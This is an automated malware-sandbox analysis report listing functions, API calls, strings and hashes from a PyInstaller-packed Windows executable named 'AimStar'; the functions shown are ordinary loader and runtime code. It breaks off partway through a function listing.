Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
API String ID: 1662231829-930877121
Opcode ID: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
Instruction ID: b6d26ab03f23901deee33b40795c6571ce7bd6a2c21ff3994ccabad1336434ce
Opcode Fuzzy Hash: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
Instruction Fuzzy Hash: 74515235A1CE4251EB50BB25E853ABEA298AF947A0FC44431DE0EC27D5EE2CF54DC360

Function 00007FF710F42180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF710F421AB
SelectObject.GDI32 ref: 00007FF710F421F2
DrawTextW.USER32 ref: 00007FF710F42215
SelectObject.GDI32 ref: 00007FF710F4222B
ReleaseDC.USER32 ref: 00007FF710F4223B
MoveWindow.USER32 ref: 00007FF710F4228B
MoveWindow.USER32 ref: 00007FF710F422CB
MoveWindow.USER32 ref: 00007FF710F4231E
MoveWindow.USER32 ref: 00007FF710F42366

Strings

P%, xrefs: 00007FF710F421FF

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction ID: b7eca231638e3e1f5ba7d381d938b4126c3882f35701ec47ed7984308b3d99ef
Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction Fuzzy Hash: 5351E836608BA186D6249F26A4181BAF7A1F798B61F404131EFDE83795DF3CE089D720

Function 00007FF710F480B0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetWindowLongPtrW.USER32 ref: 00007FF710F480EF
GetWindowLongPtrW.USER32 ref: 00007FF710F4816F
ShutdownBlockReasonCreate.USER32 ref: 00007FF710F48182
GetLastError.KERNEL32 ref: 00007FF710F4818C
SetWindowLongPtrW.USER32 ref: 00007FF710F481A3

Strings

Needs to remove its temporary files., xrefs: 00007FF710F48175

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: LongWindow$BlockCreateErrorLastReasonShutdown
String ID: Needs to remove its temporary files.
API String ID: 3975851968-2863640275
Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
Instruction ID: 271f43225315fbb57902a094c190d750cbadc835227f0e016bd32e2443c5b9d7
Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
Instruction Fuzzy Hash: 5C21AB35B0CE4681E7416B7AA856579A358EF88BB0F884131DE2D833D5DE2CF5DAC320

Function 00007FF710F56300 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF710F56343
_invalid_parameter_noinfo.LIBCMT ref: 00007FF710F56730
_invalid_parameter_noinfo.LIBCMT ref: 00007FF710F569CC

Strings

p, xrefs: 00007FF710F5646D
f, xrefs: 00007FF710F56465
p, xrefs: 00007FF710F563F5
-, xrefs: 00007FF710F563D9
:, xrefs: 00007FF710F564FC

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction ID: b5ba3284893052e7ff98e22cb206361e043a0247dd3356c3e385f86d6f71e249
Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction Fuzzy Hash: 5A127066A0C94386FB207A14B156279B6B9FB48764FC44135E6A947BC4DF3CF688CB20

Function 00007FF710F51038 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF710F51078
_invalid_parameter_noinfo.LIBCMT ref: 00007FF710F51440
_invalid_parameter_noinfo.LIBCMT ref: 00007FF710F516DF

Strings

f, xrefs: 00007FF710F5117A
f, xrefs: 00007FF710F51110
p, xrefs: 00007FF710F51182
p, xrefs: 00007FF710F5111D
f, xrefs: 00007FF710F512C5

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction ID: 8fcf5eb3ddbe455194ae058d66137542549d630644bbf7affd90912af0b487e5
Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction Fuzzy Hash: AF12C322E0C94386FB20BA55E05667AF679FB40764FC84135E69947BC4DB7CF688CB20

Function 00007FF710F41050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF710F41108
fread, xrefs: 00007FF710F411FD
Failed to extract %s: failed to open archive file!, xrefs: 00007FF710F41098
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF710F410CC
malloc, xrefs: 00007FF710F4110F
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF710F411F6
fseek, xrefs: 00007FF710F410D3

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: 53d1e4d2edf0062f7230160cf0d8e608199b832438cf6a3aedd647e8abf4d892
Instruction ID: 08dcf96e05720c10e5db8cf28e69652d89cfcbe5d6b1e84d60c8090fcd684549
Opcode Fuzzy Hash: 53d1e4d2edf0062f7230160cf0d8e608199b832438cf6a3aedd647e8abf4d892
Instruction Fuzzy Hash: E6414025B0CA5241EA10FB15A8029B9E3ACBF84BE4FD44532EE0D47795DE3CF549C760

Function 00007FF710F41470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF710F41518
fread, xrefs: 00007FF710F415E6
Failed to extract %s: failed to open archive file!, xrefs: 00007FF710F4149F
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF710F414DE
malloc, xrefs: 00007FF710F4151F
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF710F415DF
fseek, xrefs: 00007FF710F414E5

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: 9c0a33a636d22d269d029a952bcb6a186b4f055325f6749c3ab7856a71983fc4
Instruction ID: 123a62a414823c4e96fb700e46b34fcb8be80b4484f9d6206dcf61333e7ba831
Opcode Fuzzy Hash: 9c0a33a636d22d269d029a952bcb6a186b4f055325f6749c3ab7856a71983fc4
Instruction Fuzzy Hash: F3417D35B0CA4685EA10EB21A4029F9E3A8BF847A4FC44432EE1D47B95DF3CF54AC724

Function 00007FF710F4EA78 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF710F4EAD5

Part of subcall function 00007FF710F4FA2C: __GetUnwindTryBlock.LIBCMT ref: 00007FF710F4FA6F
Part of subcall function 00007FF710F4FA2C: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF710F4FA94

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF710F4EBAD
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF710F4EDFB
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF710F4EF08

Strings

csm, xrefs: 00007FF710F4EAEF
csm, xrefs: 00007FF710F4EBD0
csm, xrefs: 00007FF710F4EB56

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
Instruction ID: ba9606a0720221f5dedbac9e2a35ca0a34bbd462ca31193e3ed612490fa84e28
Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
Instruction Fuzzy Hash: EED18032A0CF4186EB20AF6594427ADB7A8FB557A8F900135EE4D97B95DF38F188C710

Function 00007FF710F42C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF710F43706,?,00007FF710F43804), ref: 00007FF710F42C9E
FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF710F43706,?,00007FF710F43804), ref: 00007FF710F42D63
MessageBoxW.USER32 ref: 00007FF710F42D99

Strings

<FormatMessageW failed.>, xrefs: 00007FF710F42D70
Error, xrefs: 00007FF710F42D8C
[PYI-%d:ERROR] , xrefs: 00007FF710F42CA6
%ls: , xrefs: 00007FF710F42D22

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: Message$CurrentFormatProcess
String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
API String ID: 3940978338-251083826
Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
Instruction ID: 216ef6fa3523ed6eff54554195cb6d0f90483de71eba51f70b48dfb83722ca6f
Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
Instruction Fuzzy Hash: 5231E936B0CE4142E620BB15A8056AAB7A9BF847E8F810135EF4D93759DF3CE54EC310

Function 00007FF710F4DD38 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF710F4DFEA,?,?,?,00007FF710F4DCDC,?,?,?,00007FF710F4D8D9), ref: 00007FF710F4DDBD
GetLastError.KERNEL32(?,?,?,00007FF710F4DFEA,?,?,?,00007FF710F4DCDC,?,?,?,00007FF710F4D8D9), ref: 00007FF710F4DDCB
LoadLibraryExW.KERNEL32(?,?,?,00007FF710F4DFEA,?,?,?,00007FF710F4DCDC,?,?,?,00007FF710F4D8D9), ref: 00007FF710F4DDF5
FreeLibrary.KERNEL32(?,?,?,00007FF710F4DFEA,?,?,?,00007FF710F4DCDC,?,?,?,00007FF710F4D8D9), ref: 00007FF710F4DE63
GetProcAddress.KERNEL32(?,?,?,00007FF710F4DFEA,?,?,?,00007FF710F4DCDC,?,?,?,00007FF710F4D8D9), ref: 00007FF710F4DE6F

Strings

api-ms-, xrefs: 00007FF710F4DDDD

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
Instruction ID: 853c3a26a537e7d2465522cde10f4a0b5f18e21b3eef837394acedc0993c0b6b
Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
Instruction Fuzzy Hash: D7316031B1EE4291EE12BB16A802965B39CBF58BB0F994535ED1D8B384DF3CF449C224

Function 00007FF710F46350 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON

Download Yara Rule

Strings

ucrtbase.dll, xrefs: 00007FF710F463CD
Failed to load Python DLL '%ls'., xrefs: 00007FF710F46497
Path of Python shared library (%s) and its name (%s) exceed buffer size (%d), xrefs: 00007FF710F46446
LoadLibrary, xrefs: 00007FF710F4649E
Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d), xrefs: 00007FF710F463B7
Path of ucrtbase.dll (%s) and its name exceed buffer size (%d), xrefs: 00007FF710F463F7

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
API String ID: 2050909247-2434346643
Opcode ID: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
Instruction ID: 6cdda9dbe1ba3b20033d58d39b451a3c8e5bbe71f606a2f617c8e0659e527b87
Opcode Fuzzy Hash: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
Instruction Fuzzy Hash: 4C415E35A0CE8691EA11FB20E4566E9A319FB48364FC00132EE5D83795EF3CF509C3A0

Function 00007FF710F42A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF710F4351A,?,00000000,00007FF710F43F23), ref: 00007FF710F42AA0

Strings

Warning [ANSI Fallback], xrefs: 00007FF710F42B0F
0, xrefs: 00007FF710F42B16
WARNING, xrefs: 00007FF710F42AAF
Warning, xrefs: 00007FF710F42B1E
[PYI-%d:%s] , xrefs: 00007FF710F42AA8

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: CurrentProcess
String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-2900015858
Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
Instruction ID: 0f0f0d5a9249bc98915b7cc3474f4b9a530fc357db95e0eb6dc3a63627fc87c9
Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
Instruction Fuzzy Hash: 3A21713261CB8152E660AB51B8427E6B398BB88794F800132EE8C93759DF3CE249C750

Function 00007FF710F5B1C0 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF710F5B1CF
FlsGetValue.KERNEL32 ref: 00007FF710F5B1E4
FlsSetValue.KERNEL32 ref: 00007FF710F5B205
FlsSetValue.KERNEL32 ref: 00007FF710F5B232
FlsSetValue.KERNEL32 ref: 00007FF710F5B243
FlsSetValue.KERNEL32 ref: 00007FF710F5B254
SetLastError.KERNEL32 ref: 00007FF710F5B26F

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 95e941e89c228e9c604249a81e4247bf93b8921c3316e711f137cef7aac77c3c
Instruction ID: ec8c900ca757510be56ef085bbb0fbb0c40bb3f20410fca852bcff1081ca1fb1
Opcode Fuzzy Hash: 95e941e89c228e9c604249a81e4247bf93b8921c3316e711f137cef7aac77c3c
Instruction Fuzzy Hash: D9218920E0CE0A42FA69B761565713DE16A4F487B0FC44234E93E46BD6DE2CB608C731

Function 00007FF710F67DDC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF710F67E0D
GetLastError.KERNEL32 ref: 00007FF710F67E19
CloseHandle.KERNEL32 ref: 00007FF710F67E31
CreateFileW.KERNEL32 ref: 00007FF710F67E5C
WriteConsoleW.KERNEL32 ref: 00007FF710F67E7B

Strings

CONOUT$, xrefs: 00007FF710F67E3D

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
Instruction ID: 732320e3b8c495d97d97ede59262e3ee1c6437d447202657a45c83e13bf318aa
Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
Instruction Fuzzy Hash: 7311842561CF4586E351AB52E85A329F3A8FB98BF4F400234E95D87794DF7CE848C750

Function 00007FF710F48560 Relevance: 9.1, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF710F49216), ref: 00007FF710F48592
K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF710F49216), ref: 00007FF710F485E9

Part of subcall function 00007FF710F49400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF710F445E4,00000000,00007FF710F41985), ref: 00007FF710F49439

K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF710F49216), ref: 00007FF710F48678
K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF710F49216), ref: 00007FF710F486E4
FreeLibrary.KERNEL32(?,?,00000000,00007FF710F49216), ref: 00007FF710F486F5
FreeLibrary.KERNEL32(?,?,00000000,00007FF710F49216), ref: 00007FF710F4870A

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
String ID:
API String ID: 3462794448-0
Opcode ID: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
Instruction ID: 899c541852678944eeb4ddca8fe1334a2deef6c816ae896d4c09df081b2c4361
Opcode Fuzzy Hash: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
Instruction Fuzzy Hash: 2441B732B1DA8641E670AB11A552AAEA398FF44BE4F850035DF4D97789DF3CF50AC720

Function 00007FF710F5B338 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF710F54F81,?,?,?,?,00007FF710F5A4FA,?,?,?,?,00007FF710F571FF), ref: 00007FF710F5B347
FlsSetValue.KERNEL32(?,?,?,00007FF710F54F81,?,?,?,?,00007FF710F5A4FA,?,?,?,?,00007FF710F571FF), ref: 00007FF710F5B37D
FlsSetValue.KERNEL32(?,?,?,00007FF710F54F81,?,?,?,?,00007FF710F5A4FA,?,?,?,?,00007FF710F571FF), ref: 00007FF710F5B3AA
